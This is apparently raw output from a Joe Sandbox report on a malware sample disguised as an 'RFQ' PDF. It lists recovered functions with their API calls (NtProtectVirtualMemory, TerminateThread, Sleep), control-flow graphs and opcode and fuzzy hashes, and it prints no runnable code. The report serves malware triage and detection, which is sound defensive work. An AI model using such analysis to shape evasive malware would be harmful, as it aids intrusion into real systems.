                              Function 0056FEAD, Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 177 56fead-56ffa0 NtProtectVirtualMemory 181 56ffa8-56ffb9 177->181 182 56ffa3 call 56fc5e 177->182 183 56ffbb 181->183 182->181 183->183
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056FFA0
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: eaf0bc9078ed2f95f90ca520a36507b09693fa61f8f7ed02603ced4eb0c4e292
                              • Instruction ID: b84225aa8db2cfbeccc7010bc219e11cc133ee5e4268f9d5db34aedee129165c
                              • Opcode Fuzzy Hash: eaf0bc9078ed2f95f90ca520a36507b09693fa61f8f7ed02603ced4eb0c4e292
                              • Instruction Fuzzy Hash: 6AF044B5C483409FE3011935D94D39ABFA4BF253A4F228668EC92871B1C3AD8D40CF80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FCB9, Relevance: 1.5, APIs: 1, Instructions: 36nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 184 56fcb9-56fe36 NtProtectVirtualMemory
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 7215c32a5cd0461e3534dabf3b7b775fa15c4e430ad44c83e46ed2920a2b55d2
                              • Instruction ID: 541a75a014635228c68ccbcfe604fbda6fe01c92f7aa98248982fde90a077e0e
                              • Opcode Fuzzy Hash: 7215c32a5cd0461e3534dabf3b7b775fa15c4e430ad44c83e46ed2920a2b55d2
                              • Instruction Fuzzy Hash: 09F050F6841210CFD3009F34EA0E9643FB4FE1E3B43655792D885C7275C325E8019B18
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FD30, Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 189 56fd30-56fe36 NtProtectVirtualMemory
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 8e26711568805b9a6e7d9de18f5992c15a22727494236228152dc0468ba57d5d
                              • Instruction ID: 8e5049a93ada36c4122b57c8367f6bb2773df6c2a9a19ba912523908dd5d26ab
                              • Opcode Fuzzy Hash: 8e26711568805b9a6e7d9de18f5992c15a22727494236228152dc0468ba57d5d
                              • Instruction Fuzzy Hash: F7F020F28012018FC3009F34DA0EA257FA4FE2D3B036593C6C89AC76B6C321D8055B24
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FD59, Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 197 56fd59-56fe36 NtProtectVirtualMemory
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: b99be0aaa30749070e305b7adddb96e7fcb0857d874ccb8900d916b8809fc9a7
                              • Instruction ID: 5b90382226e323c3185ed86594d1a3d9766bbe260fafd4eea4739c93ab74f08d
                              • Opcode Fuzzy Hash: b99be0aaa30749070e305b7adddb96e7fcb0857d874ccb8900d916b8809fc9a7
                              • Instruction Fuzzy Hash: 18E020769012118BD200AF28EE4FE755EB6E9563B8338CA63DC17C32A5C319D9019720
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FD4D, Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 193 56fd4d-56fe36 NtProtectVirtualMemory
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 944fc3a6f04d00206d563a1596afd86a9606fbed106cce3f55fa7767eca45634
                              • Instruction ID: ee75debf2873ba6261a5ca500c480c6fbb71a8232ca8d2f14cd7193823e9f6a6
                              • Opcode Fuzzy Hash: 944fc3a6f04d00206d563a1596afd86a9606fbed106cce3f55fa7767eca45634
                              • Instruction Fuzzy Hash: 1CE02BF1901211CFD3048F39AA4D9793F78BF193B837587A7D955C72A5C360E8419718
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FDB5, Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 201 56fdb5-56fe36 NtProtectVirtualMemory
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 70876a7d89a63c1f4378f1ddba55173bb840542a44a9785cde6c1f6f641684e0
                              • Instruction ID: dcc8ee8e41cd6fa3f1cb38288a79a2925de19322a29607a62a7d8a87844583f6
                              • Opcode Fuzzy Hash: 70876a7d89a63c1f4378f1ddba55173bb840542a44a9785cde6c1f6f641684e0
                              • Instruction Fuzzy Hash: B9E022F20012018FC300DF34DA0EA293F74FF182B436583C6D85ACB5BAC324C4099B18
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FF09, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056FFA0
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: bb179ebbd9c7a4f58f6b974b1671c58833cff8b4dd4f2972178de6fd41aab561
                              • Instruction ID: 4748f64aecf7339fcc508e71e36ec7b5aa204fb9e0eef4d7179f59f7a10e4a67
                              • Opcode Fuzzy Hash: bb179ebbd9c7a4f58f6b974b1671c58833cff8b4dd4f2972178de6fd41aab561
                              • Instruction Fuzzy Hash: DFE09270D492908FE2456E36A10E299BFB5BE153A5B518469989247135836D5D44CF01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FE11, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: edd0a00126b3d80af91fab243cf447798f413e9f90ddc82d26b5a1f3375154ff
                              • Instruction ID: 746befd479744594d45d00703da676159f08d21e8a760930059be23fe6e14851
                              • Opcode Fuzzy Hash: edd0a00126b3d80af91fab243cf447798f413e9f90ddc82d26b5a1f3375154ff
                              • Instruction Fuzzy Hash: 4ED0C23160115187D245673C6A0D474AF386E237B53B09753D479C26BAC3019C01D654
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FF79, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056FFA0
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 4ff5dbe5da8c7a32038f5f3402e253a3dca2ec7999d36f262bd3363c5626e8d6
                              • Instruction ID: ef3b00e3aa37d14c3109ef53ab46f680713ebe12c6b7f370b9f289717e101169
                              • Opcode Fuzzy Hash: 4ff5dbe5da8c7a32038f5f3402e253a3dca2ec7999d36f262bd3363c5626e8d6
                              • Instruction Fuzzy Hash: A2E086B58493818FE3946E32C10E39ABBB1FF047E1B519458989287076D36D8C85CF01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FD9D, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 7cabecca5a79462be3d23bd78651fca566872abe62f8cd7bb8103722633c6eec
                              • Instruction ID: 9934453e0780b8b90f8ed7c4393a64579cb00ed9d465a932e33ff115940575bc
                              • Opcode Fuzzy Hash: 7cabecca5a79462be3d23bd78651fca566872abe62f8cd7bb8103722633c6eec
                              • Instruction Fuzzy Hash: 5CD02E36A011208782019B78AA0C428AF74AA227B63708363D12AC22A58250AA02C658
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FE85, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056FFA0
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 4b2581240f1d60c1ecb024bef4508351cd67aff2c2f18132576067bbf68a0ae3
                              • Instruction ID: b959f23ca0d390aebabc5582f718a0c24a13ab5914ec7b8dd110d6e662b0ec32
                              • Opcode Fuzzy Hash: 4b2581240f1d60c1ecb024bef4508351cd67aff2c2f18132576067bbf68a0ae3
                              • Instruction Fuzzy Hash: 05E04FB0D493818FE3455A31A10E3AAFBF5FF1A3A0B6194A998A24713183694D488F11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056F961, Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 14 56f961-56fa4d TerminateThread 19 56fa53-56fa6e 14->19 20 56fbdc-56fbf6 14->20 19->20 22 56fa74-56fa78 19->22 22->20 23 56fa7e-56fa82 22->23 23->20 24 56fa88-56fa8c 23->24 24->20 26 56fa92-56fa96 24->26 26->20 27 56fa9c-56faa0 26->27 27->20 28 56faa6-56faaf 27->28 28->20 29 56fab5-56fafb 28->29 31 56fafc-56fb08 29->31 32 56fb0a-56fb0e 31->32 33 56fb4b-56fbd8 31->33 32->20 35 56fb14-56fb15 32->35 35->31
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: TerminateThread
                              • String ID:
                              • API String ID: 1852365436-0
                              • Opcode ID: 5c2bf0e298c7abf3985b2f128f5c5113bd294ed2f781ad82465c9b6c9cfaefec
                              • Instruction ID: 37f04d7daa44109be41593f58dcb4970cfbfc3c307377564ced31cf795014053
                              • Opcode Fuzzy Hash: 5c2bf0e298c7abf3985b2f128f5c5113bd294ed2f781ad82465c9b6c9cfaefec
                              • Instruction Fuzzy Hash: 37213870A00301CFDB208F20E4ACBA17F91BF52314F1996B9C8888B1B6D77988C5CB03
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056F96D, Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 39 56f96d-56f96e 40 56f971-56f987 39->40 40->40 41 56f989-56fa4d TerminateThread 40->41 46 56fa53-56fa6e 41->46 47 56fbdc-56fbf6 41->47 46->47 49 56fa74-56fa78 46->49 49->47 50 56fa7e-56fa82 49->50 50->47 51 56fa88-56fa8c 50->51 51->47 53 56fa92-56fa96 51->53 53->47 54 56fa9c-56faa0 53->54 54->47 55 56faa6-56faaf 54->55 55->47 56 56fab5-56fafb 55->56 58 56fafc-56fb08 56->58 59 56fb0a-56fb0e 58->59 60 56fb4b-56fbd8 58->60 59->47 62 56fb14-56fb15 59->62 62->58
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: TerminateThread
                              • String ID:
                              • API String ID: 1852365436-0
                              • Opcode ID: 6e3a25f462df5de155bf85cf591e672d5b07aabc8e804d13e703eaad73d9eb60
                              • Instruction ID: 169cd176bc12d1d3936410360625851b23760bdb81558d91c5417e8f5deb64f8
                              • Opcode Fuzzy Hash: 6e3a25f462df5de155bf85cf591e672d5b07aabc8e804d13e703eaad73d9eb60
                              • Instruction Fuzzy Hash: 5A21B370A04305DFDB248F20E5A8BA57BA1BF51315F1596B9C9898B2B2D77988C5CF03
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056F9E2, Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 83 56f9e2-56f9e3 84 56f966-56fa04 TerminateThread 83->84 85 56f9e5-56fa04 TerminateThread 83->85 86 56fa36-56fa4d 84->86 85->86 90 56fa53-56fa6e 86->90 91 56fbdc-56fbf6 86->91 90->91 93 56fa74-56fa78 90->93 93->91 94 56fa7e-56fa82 93->94 94->91 95 56fa88-56fa8c 94->95 95->91 97 56fa92-56fa96 95->97 97->91 98 56fa9c-56faa0 97->98 98->91 99 56faa6-56faaf 98->99 99->91 100 56fab5-56fafb 99->100 102 56fafc-56fb08 100->102 103 56fb0a-56fb0e 102->103 104 56fb4b-56fbd8 102->104 103->91 106 56fb14-56fb15 103->106 106->102
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: TerminateThread
                              • String ID:
                              • API String ID: 1852365436-0
                              • Opcode ID: f54893c98f32c00ffa2d375560a7a31b581adbdebdd3f9d4508dc2d37cdd3b11
                              • Instruction ID: 5270807656c524802a47ba8c58e62946b874a2547d98a1b015feaf81962bc7cc
                              • Opcode Fuzzy Hash: f54893c98f32c00ffa2d375560a7a31b581adbdebdd3f9d4508dc2d37cdd3b11
                              • Instruction Fuzzy Hash: 4911C170A04205CFDB208F14E4A8B717FA2BF52325F1996B9C9498B1B2DB7999C5CB03
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FE50, Relevance: 1.3, APIs: 1, Instructions: 23sleepCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 4b0bbebb5e607e076dee0eda01d44f4cc1a82bcf052f94bfe5b415e453a07e94
                              • Instruction ID: d3db8af89a85bd19ea770e6d75cf5cbacf1bf9274c904086c581cf719ae7745a
                              • Opcode Fuzzy Hash: 4b0bbebb5e607e076dee0eda01d44f4cc1a82bcf052f94bfe5b415e453a07e94
                              • Instruction Fuzzy Hash: D8E09274A0C350EFE792A764745DB95BFA07F16325F1559ABE8814B663C2228801CB23
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FEB9, Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: dcb3be7716b681e6efd61c0be9e298e4f274a85c5b443a1539b8fb83be5baf83
                              • Instruction ID: 324d32f85be974663bb7af87abfc5b7bb035dc388d79e23cec23c0af2f0850b1
                              • Opcode Fuzzy Hash: dcb3be7716b681e6efd61c0be9e298e4f274a85c5b443a1539b8fb83be5baf83
                              • Instruction Fuzzy Hash: 61E04F30B043029FFB55AB64A18DF69BFA07F05355F4A84A5AD059B163C732C880CB11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FE61, Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 2700c5df642227fbcb53a522c0b14be7e38c80fa969afa9bd3057227d1aa779b
                              • Instruction ID: 186b332cf2af8cd875aa7a0b6d6f1e4677576079ff7ff4a65db2aa8125867680
                              • Opcode Fuzzy Hash: 2700c5df642227fbcb53a522c0b14be7e38c80fa969afa9bd3057227d1aa779b
                              • Instruction Fuzzy Hash: BFD09730F00220CEE2415B44B08DA14AFF47B12346B6288B2E804073338322EC02DB12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FE95, Relevance: 1.3, APIs: 1, Instructions: 15sleepCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: ea13cce957c3d47430f9afa2eb12cf3f2c36cc71e2e35cd8c87955ec1115c054
                              • Instruction ID: 6e3cb16aa3e02ac9d85f5388df25fc0b653766d37c7a0a9a74405f6b500f70df
                              • Opcode Fuzzy Hash: ea13cce957c3d47430f9afa2eb12cf3f2c36cc71e2e35cd8c87955ec1115c054
                              • Instruction Fuzzy Hash: 2DC02288F80230CAF0462558780E3445F683729345B622AA2ECE10236A42867C01DF26
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FF15, Relevance: 1.3, APIs: 1, Instructions: 5sleepCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: c07b8a882928105abcf6b2d2fddb653524995a1b3bc6ea25740c4544dd0c497c
                              • Instruction ID: 438c1276e2ad8ef72751f0dc14538f25f8e669410b31f650894a66393c50af87
                              • Opcode Fuzzy Hash: c07b8a882928105abcf6b2d2fddb653524995a1b3bc6ea25740c4544dd0c497c
                              • Instruction Fuzzy Hash: FDA01230301202CF51481E105009544FB347E1034431225E1E412154A38321C4809741
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions